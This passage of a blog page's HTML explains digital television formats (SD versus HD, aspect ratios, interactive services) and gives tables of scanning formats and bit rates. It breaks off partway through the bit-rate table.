waves) in which a television antenna is required. FM radio programming,
high-speed Internet, telephony, and similar non-television services may also be
provided. The major difference is the change of radio frequency signals used
and optical connections to the subscriber property. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigKxf81ILYIdzVhTykFPXJpSahx6-Az5LF_RaNhfzq1Di2asNYIJ9YcEbTxEpUGI7KcCCl9oLi9RNCZiV0g28sRdZabmA9b_cK132D23UQqptabL4xTmpPmNWX-wK7OWXc2nxqWIkIn1c/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigKxf81ILYIdzVhTykFPXJpSahx6-Az5LF_RaNhfzq1Di2asNYIJ9YcEbTxEpUGI7KcCCl9oLi9RNCZiV0g28sRdZabmA9b_cK132D23UQqptabL4xTmpPmNWX-wK7OWXc2nxqWIkIn1c/s400/11.jpg" width="400" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">With digital terrestrial television (DTV)
broadcasting, the range of formats can be broadly divided into two categories:
high definition television (HDTV) for the transmission of high-definition video
and standard-definition television (SDTV). These terms by themselves are not
very precise, and many subtle intermediate cases exist.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Digital television can be used to interact with the
viewer because of advanced technology it uses. Basically it can be divided into
two parts.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l3 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">1.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Enhanced
TV – whilst watching a program a viewer can access additional information,
different views or respond to questions asked.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l3 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">2.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Interactive
services – accessing information independent of a television channel.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l3 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv8pXXGyTing2_A9tqgEGMQL_yL-w0uXPEq4R75n3zu_Qeg0fUeC-IgWYsLnf2wwUulaHrfZv0KLfPGiuK18yNKxF2Kd9YiWSMYbchYSwncukoYQUAXKb8GprOaxQV9ZIF8OKEvMyPBd4/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv8pXXGyTing2_A9tqgEGMQL_yL-w0uXPEq4R75n3zu_Qeg0fUeC-IgWYsLnf2wwUulaHrfZv0KLfPGiuK18yNKxF2Kd9YiWSMYbchYSwncukoYQUAXKb8GprOaxQV9ZIF8OKEvMyPBd4/s320/11.jpg" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">The interactivity can be done by remote server. In
digital televisions there will be a return channel to request data from a
remote server. This maybe satellite via existing telephone line or cable – via its
own network etc. These types of systems are open systems but there are closed
systems also. In closed systems there are broadcast modules on a carousel and
set-up box captures a module and holds it for interaction.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">There are two types of digital TV<o:p></o:p></span></div>
<div class="MsoNormal" style="text-indent: .5in;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">1. Standard definition
(SD) <o:p></o:p></span></div>
<div class="MsoNormal" style="text-indent: .5in;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">2. High definition
(HD).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Standard definition is a lower form of digital TV.
The aspect ratio for SD TV is 4:3, which is more square-like in appearance.
That’s why when watching SD images on a HDTV we can see either a stretched
picture or a picture with black bars on the side of the screen.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">High definition is the highest form of digital TV.
The aspect ratio for HD is 16:9, which is rectangular like a movie theater
screen. That’s why when watching HD images on an analog or SDTV that we will
see black bars on the top and bottom of the screen. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/wIIjT3xotHU" width="420"></iframe></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt;"><o:p> </o:p></span><span style="font-size: 12pt;">Progressive Video
Scanning Formats for Digital TV</span></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable">
<tbody>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Vertical Lines<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Horizontal Pixels<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Aspect Ratio<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Frame Rate per Second<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1080<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1920<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16:9<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24, 30<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">720<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1280<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16:9<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24, 30, 60<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">704<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16:9<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24, 30, 60<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">704<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">4:3<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24, 30, 60<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">640<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">4:3<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24, 30, 60<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt;">Interlaced Video
Scanning Formats for Digital TV</span><span style="font-size: 12pt;"><o:p></o:p></span></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable">
<tbody>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Vertical Lines<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Horizontal Pixels<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Aspect Ratio<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Frame Rate per Second<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1080<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1920<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16:9<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">704<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16:9<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">704<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">4:3<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">640<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">4:3<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt;">Bit Rate Requirements
for Various Display Formats</span><span style="font-size: 12pt;"><o:p></o:p></span></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0in; mso-padding-alt: 2.25pt 2.25pt 2.25pt 2.25pt; mso-yfti-tbllook: 1184; width: 100.0%;">
<tbody>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Format<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Pixels per Line<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Lines per Frame<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Pixels per Frame<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Frames per Second<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Millions of Pixels per
Second<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Bits per Pixel<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Mbps<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">SVGA<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">800<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">600<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480,000<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">72<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">34.6<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">8<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">276.5<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">NTSC<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">640<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">480<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">307,200<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">9.2<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">221.2<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">PAL<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">580<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">575<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">333,500<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">50<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16.7<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">400.2<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">SECAM<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">580<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">575<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">333,500<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">50<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">16.7<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">400.2<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">HDTV<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1920<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1080<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">2,073,600<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">30<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">62.2<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1492.8<o:p></o:p></span></div>
</td>
</tr>
<tr>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Film<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">2000<o:p></o:p></span></div>
</td>
